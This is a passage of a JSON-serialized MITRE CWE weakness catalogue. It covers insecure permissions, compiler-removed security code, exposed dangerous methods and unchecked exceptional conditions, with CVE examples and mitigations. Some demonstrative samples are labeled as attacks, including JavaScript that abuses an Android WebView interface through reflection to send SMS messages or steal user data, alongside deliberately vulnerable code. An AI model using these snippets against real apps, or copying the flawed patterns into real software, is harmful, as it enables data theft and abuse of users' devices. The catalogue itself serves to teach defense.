inter-process communication, allowing attackers to tamper with a session.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5544"},{"Reference":"CVE-2005-4868","Description":"Database product uses read/write permissions for everyone for its shared memory, allowing theft of credentials.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4868"},{"Reference":"CVE-2004-1714","Description":"Security product uses \\"Everyone: Full Control\\" permissions for its configuration files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1714"},{"Reference":"CVE-2001-0006","Description":"\\"Everyone: Full Control\\" permissions assigned to a mutex allows users to disable network connectivity.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0006"},{"Reference":"CVE-2002-0969","Description":"Chain: database product contains buffer overflow that is only reachable through a .ini configuration file - which has \\"Everyone: Full Control\\" permissions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0969"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO03-J","Entry_Name":"Create files with appropriate access permission"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC01-J","Entry_Name":"Do not allow tainted variables in privileged blocks"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ENV03-J","Entry_Name":"Do not grant dangerous combinations of permissions"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO06-C","Entry_Name":"Create files with appropriate access permissions"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"122"}},{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"180"}},{"attr":{"@_CAPEC_ID":"206"}},{"attr":{"@_CAPEC_ID":"234"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"61"}},{"attr":{"@_CAPEC_ID":"62"}},{"attr":{"@_CAPEC_ID":"642"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;File Permissions.&#34; Page 495"}},{"attr":{"@_External_Reference_ID":"REF-207","@_Section":"Chapter 8, &#34;Access Control.&#34; Page 194"}},{"attr":{"@_External_Reference_ID":"REF-594"}},{"attr":{"@_External_Reference_ID":"REF-199"}}]},"Notes":{"Note":{"#text":"The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693).","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-08","Submission_Comment":"new weakness-focused entry for Research view."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Likelihood_of_Exploit, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Modes_of_Introduction, Observed_Examples, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Detection_Factors, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Relationships"}],"Previous_Entry_Name":[{"#text":"Insecure Permission Assignment for Resource","attr":{"@_Date":"2009-01-12"}},{"#text":"Insecure Permission Assignment for Critical Resource","attr":{"@_Date":"2009-05-27"}}]}},"733":{"attr":{"@_ID":"733","@_Name":"Compiler Optimization Removal or Modification of Security-critical Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The developer builds a security-critical protection mechanism into the software, but the compiler optimizes the program such that the mechanism is removed or modified.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1038","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Class":"Compiled","@_Prevalence":"Undetermined"}}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Black Box","Description":"This specific weakness is impossible to detect using black box methods. While an analyst could examine memory to see that it has not been scrubbed, an analysis of the executable would not be successful. This is because the compiler has already removed the relevant code. Only the source code shows whether the programmer intended to clear the memory or not, so this weakness is indistinguishable from others."},{"Method":"White Box","Description":"This weakness is only detectable using white box methods (see black box detection factor). Careful analysis is required to determine if the code is likely to be removed by the compiler."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-1685","Description":"C compiler optimization, as allowed by specifications, removes code that is used to perform checks to detect integer overflows.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1685"},{"Reference":"CVE-2019-1010006","Description":"Chain: compiler optimization (CWE-733) removes or modifies code used to detect integer overflow (CWE-190), allowing out-of-bounds write (CWE-787).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1010006"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"9"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, &#34;A Compiler Optimization Caveat&#34; Page 322"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-10-01","Submission_Comment":"new weakness-focused entry for Research view closes the gap between 14 and 435."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Applicable_Platforms, Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"}]}},"749":{"attr":{"@_ID":"749","@_Name":"Exposed Dangerous Method or Function","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.","Extended_Description":{"xhtml:p":["This weakness can lead to a wide variety of resultant weaknesses, depending on the behavior of the exposed method. It can apply to any number of technologies and approaches, such as ActiveX controls, Java functions, IOCTLs, and so on.","The exposure can occur in a few different ways:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["1) The function/method was never intended to be exposed to outside actors.","2) The function/method was only intended to be accessible to a limited set of actors, such as Internet-based access from a single web site."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Gain Privileges or Assume Identity","Read Application Data","Modify Application Data","Execute Unauthorized Code or Commands","Other"],"Note":"Exposing critical functionality essentially provides an attacker with the privilege level of the exposed functionality. This could result in the modification or exposure of sensitive data or possibly even execution of arbitrary code."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"If you must expose a method, make sure to perform input validation on all arguments, limit access to authorized parties, and protect against all possible vulnerabilities."},{"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Identify all exposed functionality. Explicitly list all functionality that must be exposed to some user or set of users. Identify which functionality may be:","Ensure that the implemented code follows these expectations. This includes setting the appropriate access modifiers where applicable (public, private, protected, etc.) or not marking ActiveX controls safe-for-scripting."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["accessible to all users","restricted to a small set of privileged users","prevented from being directly accessible at all"]}}}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following Java example the method removeDatabase will delete the database with the name specified in the input parameter.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void removeDatabase(String databaseName) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (SQLException ex) {...}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Statement stmt = conn.createStatement();stmt.execute(\\"DROP DATABASE \\" + databaseName);","xhtml:br":["",""]}}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"private void removeDatabase(String databaseName) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (SQLException ex) {...}}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Statement stmt = conn.createStatement();stmt.execute(\\"DROP DATABASE \\" + databaseName);","xhtml:br":["",""]}},"xhtml:br":""}}}}],"Body_Text":"The method in this example is declared public and therefore is exposed to any class in the application. Deleting a database should be considered a critical operation within an application and access to this potentially dangerous method should be restricted. Within Java this can be accomplished simply by declaring the method private thereby exposing it only to the enclosing class as in the following example."},{"attr":{"@_Demonstrative_Example_ID":"DX-109"},"Intro_Text":"These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){}","xhtml:i":"// Android","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (url.substring(0,14).equalsIgnoreCase(\\"examplescheme:\\")){}","xhtml:div":{"#text":"if(url.substring(14,25).equalsIgnoreCase(\\"getUserInfo\\")){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"writeDataToView(view, UserData);return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"return true;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}}},{"attr":{"@_Nature":"bad","@_Language":"Objective-C"},"xhtml:div":{"#text":"-(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{}","xhtml:i":"// iOS","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@\\"exampleScheme\\"]){}return YES;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@\\"specialFunction\\"]){}return NO;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"UIWebView *webView = [self writeDataToView:[URL query]];","xhtml:br":["",""],"xhtml:i":"// Make data available back in webview."}}}}}}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":"window.location = examplescheme://method?parameter=value"}],"Body_Text":["A call into native code can then be initiated by passing parameters within the URL:","Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site."]},{"Intro_Text":"This application uses a WebView to display websites, and creates a Javascript interface to a Java object to allow enhanced functionality on a trusted website:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class WebViewGUI extends Activity {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"WebView mainWebView;public void onCreate(Bundle savedInstanceState) {}final class JavaScriptInterface {}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"super.onCreate(savedInstanceState);mainWebView = new WebView(this);mainWebView.getSettings().setJavaScriptEnabled(true);mainWebView.addJavascriptInterface(new JavaScriptInterface(), \\"userInfoObject\\");mainWebView.loadUrl(\\"file:///android_asset/www/index.html\\");setContentView(mainWebView);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"JavaScriptInterface () {}public String getUserInfo() {}","xhtml:br":["",""],"xhtml:div":{"#text":"return currentUser.Info();","attr":{"@_style":"margin-left:10px;"}}}}]}}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":{"#text":"&lt;script&gt;&lt;/script&gt;","xhtml:div":{"#text":"userInfoObject.getClass().forName(\'android.telephony.SmsManager\').getMethod(\'getDefault\',null).sendTextMessage(attackNumber, null, attackMessage, null, null);","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["Before Android 4.2 all methods, including inherited ones, are exposed to Javascript when using addJavascriptInterface(). This means that a malicious website loaded within this WebView can use reflection to acquire a reference to arbitrary Java objects. This will allow the website code to perform any action the parent application is authorized to.","For example, if the application has permission to send text messages:","This malicious script can use the userInfoObject object to load the SmsManager object and send arbitrary text messages to any recipient."]},{"Intro_Text":"After Android 4.2, only methods annotated with @JavascriptInterface are available in JavaScript, protecting usage of getClass() by default, as in this example:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"final class JavaScriptInterface {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"JavaScriptInterface () { }@JavascriptInterfacepublic String getUserInfo() {}","xhtml:br":["","",""],"xhtml:div":{"#text":"return currentUser.Info();","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":{"#text":"&lt;script&gt;&lt;/script&gt;","xhtml:div":{"#text":"var info = window.userInfoObject.getUserInfo();sendUserInfo(info);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}],"Body_Text":["This code is not vulnerable to the above attack, but still may expose user info to malicious pages loaded in the WebView. Even malicious iframes loaded within a trusted page may access the exposed interface:","This malicious code within an iframe is able to access the interface object and steal the user\'s data."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-6382","Description":"arbitrary Java code execution via exposed method","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6382"},{"Reference":"CVE-2007-1112","Description":"security tool ActiveX control allows download or upload of files","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1112"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-503"}},{"attr":{"@_External_Reference_ID":"REF-510"}}]},"Notes":{"Note":{"#text":"Under-reported and under-studied. This weakness could appear in any technology, language, or framework that allows the programmer to provide a functional interface to external parties, but it is not heavily reported. In 2007, CVE began showing a notable increase in reports of exposed method vulnerabilities in ActiveX applications, as well as IOCTL access to OS-level resources. These weaknesses have been documented for Java applications in various secure programming sources, but there are few reports in CVE, which suggests limited awareness in most parts of the vulnerability research community.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-11-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Exposed Insecure Method or Function","attr":{"@_Date":"2009-01-12"}}}},"754":{"attr":{"@_ID":"754","@_Name":"Improper Check for Unusual or Exceptional Conditions","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not check or incorrectly checks for unusual or exceptional conditions that are not expected to occur frequently during day to day operation of the software.","Extended_Description":{"xhtml:p":["The programmer may assume that certain events or conditions will never occur or do not need to be worried about, such as low memory conditions, lack of access to resources due to restrictive permissions, or misbehaving clients or components. However, attackers may intentionally trigger these unusual conditions, thus violating the programmer\'s assumptions, possibly introducing instability, incorrect behavior, or a vulnerability.","Note that this entry is not exclusively about the use of exceptions and exception handling, which are mechanisms for both checking and handling unusual or unexpected conditions."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Many functions will return some value about the success of their actions. This will alert the program whether or not to handle any errors caused by that function."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":["DoS: Crash, Exit, or Restart","Unexpected State"],"Note":"The data which were produced as a result of a function call could be in a bad state upon return. If the return value is not checked, then this bad data may be used in operations, possibly leading to a crash or other unintended behaviors."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"Automated static analysis may be useful for detecting unusual conditions involving system resources or common programming idioms, but not for violations of business rules.","Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-12"},"Method":"Manual Dynamic Analysis","Description":"Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application\'s environment, it may still indicate unexpected conditions that were not handled by the application itself."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Choose languages with features such as exception handling that force the programmer to anticipate unusual conditions that may generate exceptions. Custom exceptions may need to be developed to handle unusual business-logic conditions. Be careful not to pass sensitive exceptions back to the user (CWE-209, CWE-248)."]}},{"Phase":"Implementation","Description":"Check the results of all functions that return a value and verify that the value is expected.","Effectiveness":"High","Effectiveness_Notes":"Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment."},{"Phase":"Implementation","Description":"If using exception handling, catch and throw specific exceptions instead of overly-general exceptions (CWE-396, CWE-397). Catch and handle exceptions as locally as possible so that exceptions do not propagate too far up the call stack (CWE-705). Avoid unchecked or uncaught exceptions where feasible (CWE-248).","Effectiveness":"High","Effectiveness_Notes":"Using specific exceptions, and ensuring that exceptions are checked, helps programmers to anticipate and appropriately handle many unusual events that could occur."},{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.","Exposing additional information to a potential attacker in the context of an exceptional condition can help the attacker determine what attack vectors are most likely to succeed beyond DoS."]}},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness_Notes":"Performing extensive input validation does not help with handling unusual conditions, but it will minimize their occurrences and will make it more difficult for attackers to trigger them."},{"attr":{"@_Mitigation_ID":"MIT-38"},"Phase":["Architecture and Design","Implementation"],"Description":"If the program must fail, ensure that it fails gracefully (fails closed). There may be a temptation to simply let the program fail poorly in cases such as low memory conditions, but an attacker may be able to assert control before the software has fully exited. Alternately, an uncontrolled failure could cause cascading problems with other downstream components; for example, the program could send a signal to a downstream process so the process immediately knows that a problem has occurred and has a better chance of recovery."},{"Phase":"Architecture and Design","Description":"Use system limits, which should help to prevent resource exhaustion. However, the software should still handle low resource conditions since they may still occur."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-7"},"Intro_Text":"Consider the following code segment:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char buf[10], cp_buf[10];fgets(buf, 10, stdin);strcpy(cp_buf, buf);","xhtml:br":["",""]}},"Body_Text":"The programmer expects that when fgets() returns, buf will contain a null-terminated string of length 9 or less. But if an I/O error occurs, fgets() will not null-terminate buf. Furthermore, if the end of the file is reached before any characters are read, fgets() returns without writing anything to buf. In both of these situations, fgets() signals that something unusual has happened by returning NULL, but in this code, the warning will not be noticed. The lack of a null terminator in buf can result in a buffer overflow in the subsequent call to strcpy()."},{"attr":{"@_Demonstrative_Example_ID":"DX-8"},"Intro_Text":"The following code does not check to see if memory allocation succeeded before attempting to use the pointer returned by malloc().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"buf = (char*) malloc(req_size);strncpy(buf, xfer, req_size);","xhtml:br":""}},"Body_Text":["The traditional defense of this coding error is: \\"If my program runs out of memory, it will fail. It doesn\'t matter whether I handle the error or simply allow the program to die with a segmentation fault when it tries to dereference the null pointer.\\" This argument ignores three important considerations:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Depending upon the type and size of the application, it may be possible to free memory that is being used elsewhere so that execution can continue."},{"xhtml:div":"It is impossible for the program to perform a graceful exit if required. If the program is performing an atomic operation, it can leave the system in an inconsistent state."},{"xhtml:div":"The programmer has lost the opportunity to record diagnostic information. Did the call to malloc() fail because req_size was too large or because there were too many requests being handled at the same time? Or was it caused by a memory leak that has built up over time? Without handling the error, there is no way to know."}]}}]},{"attr":{"@_Demonstrative_Example_ID":"DX-9"},"Intro_Text":"The following examples read a file into a byte 